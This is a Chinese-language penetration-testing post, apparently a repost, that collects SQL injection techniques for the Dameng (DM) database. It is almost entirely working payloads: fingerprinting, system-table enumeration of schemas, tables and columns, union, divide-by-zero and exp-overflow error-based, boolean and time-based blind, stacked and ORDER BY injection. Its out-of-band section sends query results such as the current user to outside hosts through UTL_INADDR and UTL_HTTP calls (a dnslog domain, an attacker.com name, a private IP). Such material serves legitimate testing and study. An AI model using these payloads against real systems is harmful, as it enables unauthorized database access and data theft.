记一次达梦数据库DMSQL-SQL注入小记
原文首发在:先知社区
https://xz.aliyun.com/t/16721
目前国产化越来越普及,平时遇到的达梦数据库也越来越多,因此决定进行下总结。由于本人能力有限,如果文章中有纰漏欢迎指正,也欢迎大家进行交流。
官方存在达梦线上实验室,可以在线试用达梦数据库,免注册,省去了自己下载安装的时间。
https://eco.dameng.com/tour/
0x01 判断DMSQL
常见的判断方法如下:
报错语句:
-
dm.jabc.driver.DMException
-
无 updatexml 等方法,
0x02 基础语法
select user -- 返回当前用户,默认是SYSDBA
select user() -- 同上
select cur_database -- 返回当前库名,默认是DAMENG
select cur_database() -- 同上
select 1 -- select语句后面可以不跟表名,存在默认表dual,可以接from dual
select 1 from dual where 1=1 && 1=1 -- &&可以代替and,但||不能代替or
2.1 注释
SELECT 1; -- 单行注释
select 1/*aaa*/from dual -- 支持/**/多行注释
不支持 #
单行注释 和/*! */
内联注释
2.2 常用运算符
DMSQL程序数据库类型与操作符
常用运算符差异不大,&& 同 AND,但 || 无法代替 OR。
0x03 函数特性
md5(1) -- 返回 0xC4CA4238A0B923820DCC509A6F75849B,返回对应MD5值,前面加了0x
exp(if(1=1,710,1))
exp(710) -- 返回整数溢出错误,使用这种方式可以强制BOOL盲注
3.1 进制转换
ASCII(str) 返回字符串第一个字符的ASCII值, ASCII('a') = 97
char(num) 返回参数num对应的ASCII字符,
chr(num) 同上,CHR(97) = a
HEX(str) 返回16进制字符串形式, hex(12) = 3132
UNHEX(str) 返回对应的字符串,unhex(3132) = 12
3.2 字符串截取
substring('1234',2,1) -- 同substr函数
substr('1234',2,1) -- 返回2,第二个参数从第几位开始取值,第三个参数代表截图多少位
-- 多种格式 SUBSTR(str,pos)、SUBSTR(str FROM pos)、SUBSTR(str,pos,len)、SUBSTR(str FROM pos FOR len), 如 substr('1234' from 2 for 1) = 2
left('123456', 3) -- 返回123,第二个参数代表返回左边几位的字符
right('123456', 3) -- 返回456,第二个参数代表返回右边几位的字符
3.3 字符串拼接
|| -- 将左右两侧字符串进行连接
CONCAT(str1,str2...) -- 将多个字符串合并为一个字符串
CONCAT_WS(separator,str1,str2...) -- 通过分隔符separator将字符串连接在一起
WM_CONCAT(column_name) -- 类似 GROUP_CONCAT(...),将某一列中的多个字符串按照一定顺序拼接成一个大的字符串,通常用于分组后的字符串拼接
LISTAGG(column_name, separator) -- 和 WM_CONCAT 类似,也是用于将分组后的列值进行拼接,并且提供了更多的控制选项,如指定分隔符等。
3.4 其他
LENGTH(str) -- 返回字符串的长度
len(str) -- 返回字符串的长度
LOWER(str) -- 将字符串字母全部转成小写。同:LCASE(str)。
UPPER(str) -- 将字符串字母全部转成大写。同:UCASE(str)。
TO_CHAR(date/time_value, 'format') -- 将日期、时间、数字等类型的数据转换为字符类型
TO_NUMBER(char_value, 'format') -- 将字符类型的数据转换为数字类型
TO_DATE(char_value, 'format') -- 将字符类型的数据转换为日期类型。
0x04 SQLi 获取数据
注入方式整体上和Oracle差不多,但是还是有一些区别。
注入语句:
4.1 基本信息
-- 查看数据库版本
SELECT banner FROM v$version; -- 注意:返回是多行
SELECT banner FROM v$version limit 0,1;
SELECT WM_CONCAT(banner) FROM v$version -- 在一行中显示
SELECT LISTAGG(banner, ', ') FROM v$version; -- 在一行中显示,高版本可用
-- 获取当前用户、当前数据库
select user
select user()
SELECT user FROM DUAL;
select cur_database
-- 获取所有用户名
select USERNAME from SYS.ALL_USERS
select WM_CONCAT(USERNAME) from SYS.ALL_USERS
4.2 查询全局变量
需要当前用户具备查询权限
SELECT NAME, TYPE, VALUE FROM V$PARAMETER;
-
NAME
列显示系统参数的名称,如BUFFER_POOL_SIZE
(缓冲池大小)等,这些参数名称用于标识不同的数据库配置项。 -
TYPE
列表示参数的类型,例如INT
(整数类型)、STRING
(字符串类型)等,这有助于了解参数值的数据格式。 -
VALUE
列则是对应的参数实际的值,例如对于BUFFER_POOL_SIZE
参数,VALUE
列可能显示一个表示大小的数字(单位可能根据参数定义而不同)。
常见有用的全局变量如下:
NAME VALUE
SYSTEM_PATH /home/dmdba/data/DAMENG
CONFIG_PATH /home/dmdba/data/DAMENG
TEMP_PATH /home/dmdba/data/DAMENG
BAK_PATH /home/dmdba/data/DAMENG/bak
DFS_PATH $/DAMENG
INSTANCE_NAME DMSERVER
INSTANCE_ADDR
PORT_NUM 5236
SVR_LOG_NAME SLOG_ALL
TRACE_PATH /home/dmdba/data/DAMENG/trace
BCT_PATH /home/dmdba/data/DAMENG
如果只想查询特定的全局变量,可以在查询语句中添加筛选条件。
查询语句:
SELECT VALUE FROM V$PARAMETER WHERE NAME = 'SYSTEM_PATH';
SELECT NAME, VALUE FROM V$PARAMETER WHERE name LIKE '%INSTANCE%'
4.3 查询系统表
1) 查询库名
SYS.SYSOBJECTS
表中保存全部的库名信息。
查询所有的库名和对应ID
select NAME,ID from SYS.SYSOBJECTS where TYPE$='SCH'
2) 查询表名
SYS.SYSOBJECTS
表中同时保存全部的表名信息。
查询所有的表名。其中SCHID来自步骤1)中获得的ID
select NAME,ID from SYS.SYSOBJECTS where TYPE$='SCHOBJ' and SUBTYPE$='UTAB' and SCHID=150995949
3) 查询列名
SYS.SYSCOLUMNS
表中字段名称和字段类型。
查询所有表对应的列名。其中ID为步骤2)中获取的ID
select NAME,TYPE$,DEFVAL from SYS.SYSCOLUMNS where ID=1078
4.4 查询视图
1) 查询用户
查询全部数据库的用户名
select USERNAME from SYS.ALL_USERS
2) 查询库名
查询全部库名,其中 OWNER 是步骤1)对应的数据库用户名。
select OBJECT_NAME from SYS.ALL_OBJECTS where OWNER='SYSDBA' and OBJECT_TYPE='SCH'
3) 查询表名
查询全部表名, OWNER 是步骤2)对应的库名。
select OBJECT_NAME from SYS.ALL_OBJECTS where OWNER='OTHER' and OBJECT_TYPE='TABLE'
4) 查询列名
可以使用下面的方式返回指定条件对应的列名,其中SCHEMA_NAME代表库名,TABLE_NAME代表表名。
select OWNER,TABLE_NAME,SCHEMA_NAME,COLUMN_NAME from SYS.ALL_COL_COMMENTS where SCHEMA_NAME='OTHER' and TABLE_NAME='xxxxxx'
0x05 联合查询注入
Union 注入与常规的没什么区别
order by num
union select 1,2,3... -- 注意列数和类型要相同
0x06 报错注入
常规的报错函数都不太行,无法直接获取结果。主要利用的是 除0错误、溢出错误,结合布尔注入进行。
6.1 除0错误
select 1 from dual where 1=1/0
结合布尔注入进行探测
SELECT * FROM t1 where rownum<5 AND 1=1 AND 1=1/if(len(user)=6,1,0) ORDER BY id DESC;
6.2 溢出错误
select exp(710)
select exp(if(1=1,710,1)) -- 数据溢出
select exp(if(len(user)=6,710,1))
SELECT * FROM t1 where rownum<5 AND 1=exp(if(len(user)=6,710,0)) ORDER BY id DESC;
SELECT * FROM t1 where rownum<5 ORDER BY id,exp(if(len(user)=6,711,0)) DESC;
SELECT * FROM t1 where rownum<5 ORDER BY id DESC, exp(if(len(user)=6,710,0));
0x07 布尔盲注
布尔盲注语法
if(expr,参数1,参数2) -- expr成立时,返回参数1的值;不成立时,返回参数2的值
CASE WHEN exp THEN state1 ELSE state2 END -- 同IF
DECODE(expr, search1, result1 [, search2, result2,...][, default_result]) -- 类似 switch case, 如果 expr=search1,则返回 result1,否则返回default_result
IFNULL(expr1,expr2) -- 如果 expr1 不为 NULL,则返回 expr1,否则返回 expr2
NULLIF(expr1,expr2) -- 若expr1与expr2不同,则返回expr1,否则返回NULL
if(1=ascii(substr('123456',2,1)),2, 1) -- 综合使用,盲注必备
CASE WHEN len(user)=6 THEN 1 ELSE 0 END
DECODE(len(user),6,1,0) -- 判断len(user)=6是否成立,成立返回1,否则返回0
案例:
SELECT * FROM t1 where rownum<5 AND 1=1 AND 1=if(len(user)=6,1,0) ORDER BY id DESC;
SELECT * FROM t1 where rownum<5 AND 1=1 AND 1=(case when len(user)=4 then 1 else 0 end) ORDER BY id DESC;
SELECT * FROM t1 where rownum<5 AND 1=1 AND 1=decode(len(user),6 ,1,0) ORDER BY id DESC;
SELECT * FROM t1 where rownum<5 AND 1=1 AND 1=IFNULL(len(user)=6,0) ORDER BY id DESC;
SELECT * FROM t1 where rownum<5 AND 1=1 AND 1=NULLIF(len(user)=6,0) ORDER BY id DESC;
0x08 时间盲注
sleep(n) -- 休眠n秒,不能和select 一起用,语法错误,失去价值
exec sleep 5 -- 延时5s
dbms_pipe.receive_message(('a'),2) -- 可以延时
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; -- 如果反查很慢,可能可以
SELECT UTL_INADDR.get_host_address('blah.attacker.com') FROM dual; -- 如果正查很慢
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual; -- 如果发送TCP包被拦截或者很慢
实际过程中时间盲注很难起到作用。测试发现,结合布尔判断时,无论True/False,都会造成延时。
0x09 DNS外带注入
需要用户可访问网络的权限
如果数据长度太长,如数据库版本,可能会导致出错,这时候要使用带外,就可以使用substr()函数来截取字符串,每次取几个特定的字符即可
发送DNS请求,DNS外带:
SELECT UTL_INADDR.get_host_address('google.com') FROM dual; -- priv
SELECT UTL_INADDR.get_host_address((select user)||'.xxx.dnslog');
SELECT UTL_HTTP.REQUEST('http://google.com') FROM dual;
SELECT UTL_HTTP.REQUEST('http://xxx.dnslog?'||(select user)) from dual;
select utl_http.request('http://192.168.0.100:8888/?'||(select user)) from dual;
0x0A 堆叠注入
在靶场中没成功,提示表不存在
,但是在实战中成功过。
10.1 结合DNS外带
结合DNS外带注入,成功获取到数据。
10.2 结合除0报错
0x0B order by 位置注入
11.1 位运算符
主要使用^亦或运算,其他也可
ORDER BY id^(if(1=2,1,2)
ORDER BY id^(if(len(user)=6,1,2))
SELECT * FROM t1 where rownum<5 ORDER BY id^(if(1=2,1,2)) DESC;
SELECT * FROM t1 where rownum<5 ORDER BY id^(if(len(user)=6,1,2)) DESC;
SELECT * FROM t1 where rownum<5 ORDER BY id&(if(len(user)=6,1,2)) DESC;
SELECT * FROM t1 where rownum<5 ORDER BY id|(if(len(user)=6,1,2)) DESC;
11.2 union
利用条件比较苛刻,需要整条语句在括号中,且前后字段数量一致
(SELECT * FROM t1 where rownum<5 ORDER BY id) union (select 1,2,user);
(SELECT * FROM t1 where rownum<5 ORDER BY id,null) union (select 1,2,user);
11.3 转化成Where
将其转化为 where 后的注入点
SELECT * FROM xxxx WHERE is_delete != '1' ORDER BY id limit 0,20
SELECT * FROM xxxx WHERE is_delete != '1' ORDER BY (select 1 from dual where 1=1/(case when len(user)=6 then 1 else 0 end)) LIMIT 0,20
0x0C limit 注入
可以接 堆叠注入
END 参考文章
-
达梦数据库手工注入笔记:https://mp.weixin.qq.com/s/vWt3aHhji7e64EMGEBXigg
-
达梦技术文档:https://eco.dameng.com/document/dm/zh-cn/pm/logical-structure.html
- 点赞
- 收藏
- 关注作者
评论(0)